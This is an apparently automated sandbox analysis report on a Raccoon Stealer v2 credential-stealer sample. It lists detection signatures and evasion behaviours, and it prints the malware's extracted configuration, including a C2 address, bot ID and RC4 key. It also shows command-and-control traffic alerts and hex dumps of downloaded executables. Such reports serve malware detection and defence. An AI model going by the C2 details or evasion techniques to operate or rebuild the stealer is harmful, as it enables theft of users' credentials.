Windows Analysis Report
KbqArOlW06.exe

Overview

General Information

Sample Name: KbqArOlW06.exe
Analysis ID: 679264
MD5: 005297e7c0d555822b5a6f31fcdc7661
SHA1: 9d5f9d90a1574c333ec68dbc800cb70397a1826d
SHA256: 6b8dac8326076b76369a8eb4e316a86a7663b597aeffe89b35e86c02aa5df4c0
Tags: exeRecordBreaker
Infos:

Detection

Raccoon Stealer v2
Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic
Yara detected Raccoon Stealer v2
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Query firmware table information (likely to detect VMs)
.NET source code contains potential unpacker
Tries to evade analysis by execution special instruction (VM detection)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
PE file contains section with special chars
Hides threads from debuggers
Obfuscated command line found
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
PE file contains strange resources
Drops PE files
Checks if the current process is being debugged
PE file contains more sections than normal
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Is looking for software installed on the system
PE file does not import any functions
Sample file is different than original file name gathered from version info
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to launch a program with higher privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: KbqArOlW06.exe Virustotal: Detection: 26% Perma Link
Source: KbqArOlW06.exe Metadefender: Detection: 28% Perma Link
Source: KbqArOlW06.exe ReversingLabs: Detection: 69%
Antivirus / Scanner detection for submitted sample
Source: KbqArOlW06.exe Avira: detected
Multi AV Scanner detection for domain / URL
Source: http://51.195.166.178/ Virustotal: Detection: 7% Perma Link
Antivirus or Machine Learning detection for unpacked file
Source: 0.3.KbqArOlW06.exe.18de6818.7.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 21.0.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen2
Source: 21.0.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.1.unpack Avira: Label: TR/Crypt.XPACK.Gen2
Source: 21.2.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen2
Source: 21.0.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.2.unpack Avira: Label: TR/Crypt.XPACK.Gen2
Source: 0.3.KbqArOlW06.exe.16726700.2.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.KbqArOlW06.exe.16636690.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.KbqArOlW06.exe.16866738.3.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.KbqArOlW06.exe.179e67e0.6.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.KbqArOlW06.exe.16ae6770.4.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.KbqArOlW06.exe.166866c8.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 21.0.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.3.unpack Avira: Label: TR/Crypt.XPACK.Gen2
Source: 0.3.KbqArOlW06.exe.16fe67a8.5.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 00000000.00000003.249916384.0000000018DE6000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Raccoon {"C2 url": ["http://51.195.166.178/", "http://51.195.166.178/"], "Bot ID": "517bb0d640c1242c3f069aab3d1018d6", "RC4_key1": "517bb0d640c1242c3f069aab3d1018d6"}
Source: KbqArOlW06.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: freebl3.pdb source: freebl3.dll.16.dr
Source: Binary string: mozglue.pdb@+ source: 2.0.0-beta2.cps.exe, 00000010.00000002.511072689.000000006D833000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.16.dr
Source: Binary string: nss3.pdb source: 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: mozglue.pdb source: 2.0.0-beta2.cps.exe, 00000010.00000002.511072689.000000006D833000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.16.dr
Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.16.dr
Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.16.dr
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00476F44 FindFirstFileA,FindNextFileA,FindClose, 22_2_00476F44
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0049AF28 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose, 22_2_0049AF28
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_004650D0 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 22_2_004650D0
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00453238 FindFirstFileA,GetLastError, 22_2_00453238
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0046554C SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 22_2_0046554C
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00463B44 FindFirstFileA,FindNextFileA,FindClose, 22_2_00463B44

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2036934 ET TROJAN Win32/RecordBreaker CnC Checkin 192.168.2.4:49778 -> 51.195.166.178:80
Source: Traffic Snort IDS: 2036955 ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response 51.195.166.178:80 -> 192.168.2.4:49778
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://51.195.166.178/
Source: Malware configuration extractor URLs: http://51.195.166.178/
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Fri, 05 Aug 2022 11:54:13 GMTContent-Type: application/octet-streamContent-Length: 2042296Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:48 GMTETag: "62543db4-1f29b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f6 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 e0 19 00 00 26 05 00 00 00 00 00 d0 01 15 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 60 1f 00 00 04 00 00 fd d1 1f 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f8 21 1d 00 5c 9d 00 00 54 bf 1d 00 40 01 00 00 00 40 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 b8 1f 00 00 00 50 1e 00 68 0a 01 00 68 fd 1c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 f0 c4 1d 00 5c 04 00 00 94 21 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 69 de 19 00 00 10 00 00 00 e0 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e4 e9 03 00 00 f0 19 00 00 ea 03 00 00 e4 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 14 4e 00 00 00 e0 1d 00 00 2a 00 00 00 ce 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 30 1e 00 00 02 00 00 00 f8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 1e 00 00 04 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0a 01 00 00 50 1e 00 00 0c 01 00 00 fe 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Fri, 05 Aug 2022 11:54:15 GMTContent-Type: application/octet-streamContent-Length: 449280Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:42 GMTETag: "62543dae-6db00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9b 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 1f 84 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 00 3f 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Fri, 05 Aug 2022 11:54:17 GMTContent-Type: application/octet-streamContent-Length: 80128Connection: keep-aliveLast-Modified: Sat, 28 May 2022 16:52:46 GMTETag: "6292535e-13900"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 74 28 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 00 3f 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Fri, 05 Aug 2022 11:54:18 GMTContent-Type: application/octet-streamContent-Length: 627128Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:36 GMTETag: "62543da8-991b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d4 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 18 08 00 00 56 01 00 00 00 00 00 b0 2f 04 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 09 00 00 04 00 00 ed ee 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 ad bc 08 00 63 51 00 00 10 0e 09 00 2c 01 00 00 00 70 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 72 09 00 b8 1f 00 00 00 80 09 00 34 43 00 00 1c b0 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 57 08 00 18 00 00 00 68 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 13 09 00 d8 03 00 00 90 b7 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d1 16 08 00 00 10 00 00 00 18 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c ff 00 00 00 30 08 00 00 00 01 00 00 1c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 1c 00 00 00 30 09 00 00 04 00 00 00 1c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 50 09 00 00 02 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 60 09 00 00 02 00 00 00 22 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 70 09 00 00 0a 00 00 00 24 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 43 00 00 00 80 09 00 00 44 00 00 00 2e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Fri, 05 Aug 2022 11:54:19 GMTContent-Type: application/octet-streamContent-Length: 684984Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:40:08 GMTETag: "62543dc8-a73b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 26 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 1a 08 00 00 36 02 00 00 00 00 00 b0 1f 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 e0 0a 00 00 04 00 00 e9 81 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 34 2c 0a 00 53 00 00 00 87 2c 0a 00 c8 00 00 00 00 a0 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 54 0a 00 b8 1f 00 00 00 b0 0a 00 38 24 00 00 84 26 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 94 2e 0a 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d5 19 08 00 00 10 00 00 00 1a 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 30 08 00 00 08 02 00 00 1e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 40 0a 00 00 02 00 00 00 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 90 0a 00 00 02 00 00 00 28 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 a0 0a 00 00 04 00 00 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 38 24 00 00 00 b0 0a 00 00 26 00 00 00 2e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Fri, 05 Aug 2022 11:54:20 GMTContent-Type: application/octet-streamContent-Length: 254392Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:58 GMTETag: "62543dbe-3e1b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 27 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f2 00 00 00 00 00 00 80 ce 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 a1 de 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 74 76 03 00 53 01 00 00 c7 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c2 03 00 b8 1f 00 00 00 c0 03 00 98 35 00 00 68 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 44 7b 03 00 8c 02 00 00 00 00 00 00 